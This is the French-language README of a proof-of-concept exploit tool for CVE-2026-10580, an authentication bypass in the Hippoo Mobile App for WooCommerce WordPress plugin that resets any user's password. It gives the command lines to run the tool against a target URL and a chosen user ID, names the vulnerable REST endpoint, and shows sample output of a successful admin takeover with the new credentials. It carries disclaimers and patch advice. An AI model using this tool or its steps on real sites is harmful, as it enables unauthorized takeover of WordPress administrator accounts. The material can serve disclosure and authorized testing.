
Exploit PoC pour CVE-2026-10580 - Contournement d'authentification dans Hippoo Mobile App for WooCommerce <= 1.9.4 menant à une prise de contrôle du compte administrateur
Cet outil est un exploit de preuve de concept pour CVE-2026-10580, une vulnérabilité de contournement d'authentification affectant le plugin WordPress Hippoo Mobile App for WooCommerce (versions <= 1.9.4). Cette vulnérabilité permet à des attaquants non authentifiés de réinitialiser le mot de passe de n'importe quel utilisateur, y compris les administrateurs, conduisant à une prise de contrôle complète du site.
⚠️ Important : Cet outil est destiné uniquement à des tests de sécurité autorisés et à des fins éducatives. Toute utilisation non autorisée contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite est illégale.
requestsInstaller les dépendances :
pip install requests
python3 exploit.py -t https://target-site.com -p NewPassword123!
Exploitation avec l'ID admin par défaut (1) et vérification SSL :
python3 exploit.py -t https://example.com -p PwnedCVE2026!!
Cibler un ID utilisateur spécifique et désactiver la vérification SSL :
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k
Exécuter sans la bannière :
python3 exploit.py -t https://example.com -p NewPass123 --no-banner
[+] Found 3 user(s)
- User ID: 1 | Username: admin | Role: administrator
- User ID: 2 | Username: editor_user | Role: editor
- User ID: 3 | Username: subscriber1 | Role: subscriber
╔══════════════════════════════════════════════════════════════╗
║ ADMIN TAKEOVER SUCCESSFUL ║
╚══════════════════════════════════════════════════════════════╝
Target: https://example.com
Login: https://example.com/wp-admin
Username: admin
Password: PwnedCVE2026!!
Si vous utilisez le plugin Hippoo, mettez-le à jour immédiatement vers une version corrigée (>1.9.4). De plus :
/wp-json/wc-hippoo/v1/ext/wp/v2/usersCe projet est sous licence MIT. Consultez le fichier LICENSE pour plus de détails.
0xgh057r3c0n
L'auteur n'est pas responsable de toute utilisation abusive de cet outil. Utilisez-le de manière responsable et uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation explicite de test.
| Argument | Description |
|---|
-t, --target | URL du site WordPress cible (ex : https://example.com) |
-p, --password | Nouveau mot de passe à définir pour le compte administrateur |
-i, --id | ID utilisateur à prendre en contrôle (par défaut : 1) |
-k, --insecure | Ignorer la vérification du certificat SSL |
--no-banner | Supprimer la bannière ASCII |